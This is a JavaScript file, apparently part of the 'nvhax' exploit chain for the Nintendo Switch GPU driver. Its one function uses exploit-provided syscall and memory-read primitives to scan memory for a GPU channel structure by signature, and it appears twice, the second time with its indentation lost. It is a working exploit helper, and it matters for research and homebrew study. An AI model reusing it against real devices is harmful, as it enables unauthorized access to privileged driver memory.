hexkyz/nvhax_find_channel.js

## nvhax_find_channel.js
sploitcore.prototype.nvhax_find_channel = function(hw_num) {
    var mem_info_addr = utils.add2(this.nvdrv_exp_ctx[6], 0x40000);
    var page_info_addr = utils.add2(this.nvdrv_exp_ctx[6], 0x40100);
    var test_addr = [0, 0];
    var ch_base_addr = [0, 0];

    // Look for user channel
    while (test_addr[1] < 0x80)
    {
        var result = this.nvhax_svc(0x06, [mem_info_addr, page_info_addr, test_addr], [], false);

        var mem_base_addr = this.read_nvdrv_mem(utils.add2(mem_info_addr, 0x00));
        var mem_size = this.read_nvdrv_mem(utils.add2(mem_info_addr, 0x08));
        var mem_type_attr = this.read_nvdrv_mem(utils.add2(mem_info_addr, 0x10));
        var mem_perm_ipc = this.read_nvdrv_mem(utils.add2(mem_info_addr, 0x18));
        var mem_dev_pad = this.read_nvdrv_mem(utils.add2(mem_info_addr, 0x20));

        var mem_type = mem_type_attr[0];
        var mem_attr = mem_type_attr[1];
        var mem_perm = mem_perm_ipc[0];
        var mem_ipc = mem_perm_ipc[1];
        var mem_dev = mem_dev_pad[0];
        var mem_pad = mem_dev_pad[1];

        if (((mem_attr & 0x04) == 0x04)
            && (mem_size[0] <= 0x10000))
        {
            var ch_sig = this.read_nvdrv_mem(utils.add2(mem_base_addr, 0x10));
            var ch_num = this.read_nvdrv_mem(utils.add2(mem_base_addr, 0xE8));

            if (ch_sig[0] == 0xFACE)
            {
                utils.log('Found channel 0x' + ch_num[0].toString(16) + ': ' + utils.paddr(mem_base_addr));

                if (ch_num[0] == hw_num)
                {
                    ch_base_addr = mem_base_addr;
                    break;
                }
            }
        }

        var next_addr_lo = (((test_addr[0] + mem_size[0]) & 0xFFFFFFFF) >>> 0);
        var next_addr_hi = (((test_addr[1] + mem_size[1]) & 0x000000FF) >>> 0);

        if ((test_addr[0] + mem_size[0]) > 0xFFFFFFFF)
            next_addr_hi++;

        test_addr[0] = next_addr_lo;
        test_addr[1] = next_addr_hi;
    }

    return ch_base_addr;
}
	sploitcore.prototype.nvhax_find_channel = function(hw_num) {
	var mem_info_addr = utils.add2(this.nvdrv_exp_ctx[6], 0x40000);
	var page_info_addr = utils.add2(this.nvdrv_exp_ctx[6], 0x40100);
	var test_addr = [0, 0];
	var ch_base_addr = [0, 0];

	// Look for user channel
	while (test_addr[1] < 0x80)
	{
	var result = this.nvhax_svc(0x06, [mem_info_addr, page_info_addr, test_addr], [], false);

	var mem_base_addr = this.read_nvdrv_mem(utils.add2(mem_info_addr, 0x00));
	var mem_size = this.read_nvdrv_mem(utils.add2(mem_info_addr, 0x08));
	var mem_type_attr = this.read_nvdrv_mem(utils.add2(mem_info_addr, 0x10));
	var mem_perm_ipc = this.read_nvdrv_mem(utils.add2(mem_info_addr, 0x18));
	var mem_dev_pad = this.read_nvdrv_mem(utils.add2(mem_info_addr, 0x20));

	var mem_type = mem_type_attr[0];
	var mem_attr = mem_type_attr[1];
	var mem_perm = mem_perm_ipc[0];
	var mem_ipc = mem_perm_ipc[1];
	var mem_dev = mem_dev_pad[0];
	var mem_pad = mem_dev_pad[1];

	if (((mem_attr & 0x04) == 0x04)
	&& (mem_size[0] <= 0x10000))
	{
	var ch_sig = this.read_nvdrv_mem(utils.add2(mem_base_addr, 0x10));
	var ch_num = this.read_nvdrv_mem(utils.add2(mem_base_addr, 0xE8));

	if (ch_sig[0] == 0xFACE)
	{
	utils.log('Found channel 0x' + ch_num[0].toString(16) + ': ' + utils.paddr(mem_base_addr));

	if (ch_num[0] == hw_num)
	{
	ch_base_addr = mem_base_addr;
	break;
	}
	}
	}

	var next_addr_lo = (((test_addr[0] + mem_size[0]) & 0xFFFFFFFF) >>> 0);
	var next_addr_hi = (((test_addr[1] + mem_size[1]) & 0x000000FF) >>> 0);

	if ((test_addr[0] + mem_size[0]) > 0xFFFFFFFF)
	next_addr_hi++;

	test_addr[0] = next_addr_lo;
	test_addr[1] = next_addr_hi;
	}

	return ch_base_addr;
	}